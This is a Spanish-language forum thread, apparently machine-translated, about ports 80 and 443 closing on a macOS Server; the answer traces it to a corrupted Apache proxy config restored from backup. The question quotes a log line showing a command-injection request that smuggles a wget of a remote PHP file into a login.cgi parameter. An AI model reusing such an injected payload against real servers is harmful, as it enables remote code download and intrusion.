2 votos

los puertos 80 y 443 se cerraron de repente en el servidor macos

cuento corto

Los puertos 80 y 443 parece ser cerrado en mi MacOS Servidor (comprobado con la Utilidad de Red) - no puede acceder a cualquier página web tanto de la red local y a internet.

Se han reiniciado los sitios web de servicio y reinicia el servidor par de veces.

Cómo volver a abrir los puertos 80 y 443?


largo de la historia

Tengo par de sitios web alojados en mi MacOS Servidor con los Sitios web de servicio.

Estaba funcionando bien hasta hace 2 días.

Ayer me di cuenta de que yo no era capaz de acceder a cualquiera de que el servidor del sitio web ni a través de red local o de internet. Después de la investigación me di cuenta de que los puertos 80 y 443 no están abiertos en el servidor de la máquina.

He reiniciado el servidor par de veces, apaga y se vuelve a los Sitios web de servicio, ningún cambio.

No veo nada malo en los registros, además de un poco raro solicitar que parece ser el último acceso al servidor web desde el exterior mundo, y reza como sigue:

default 88.207.212.19 - - [23/Feb/2019:11:59:10 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://128.199.251.119/t.php%27$ HTTP/1.1" 302 331 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

Puedo ejecutar la versión anterior del Servidor de app - 5.6.3 en MacOS 10.13.6

No he instalado/actualizado ni cambiado nada en el Servidor o en mi red local en los últimos días.

actualización

Me he dado cuenta de que tengo un montón de entradas en el registro del sistema del servidor:

... com.apple.xpc.launchd[1] (com.apple.serviceproxy[__various port numbers__]): Service exited with abnormal code: 1
... com.apple.xpc.launchd[1] (com.apple.serviceproxy): Service only ran for 0 seconds. Pushing respawn out by 10 seconds.

independientemente de los sitios web de servicio que se ejecuta o no

1voto

Matt R Puntos 136

Resultó que el /Library/Server/Web/Config/Proxy/apache_serviceproxy_customsites.conf archivo se corrompió.

Por suerte, había una copia de seguridad de archivos en el mismo directorio /Library/Server/Web/Config/Proxy/apache_serviceproxy_customsites.conf.previous y simple intercambio resuelto el problema! (recuerde reiniciar los Sitios web del servicio)

No estoy seguro si esto es relevante, pero es posible que: De Etrecheck informe me he dado cuenta de que no era un MacOS actualización sobre el tiempo cuando se produjo el problema: 2019-02-19 Actualización De Seguridad 2019-001 (10.13.6)


El Soporte técnico de Apple Comunidades hilo que ayudó a la pista de abajo de la cuestión: https://discussions.apple.com/thread/250188369

AppleAyuda.com

AppleAyuda es una comunidad de usuarios de los productos de Apple en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros usuarios, hacer tus propias preguntas o resolver las de los demás.

Powered by: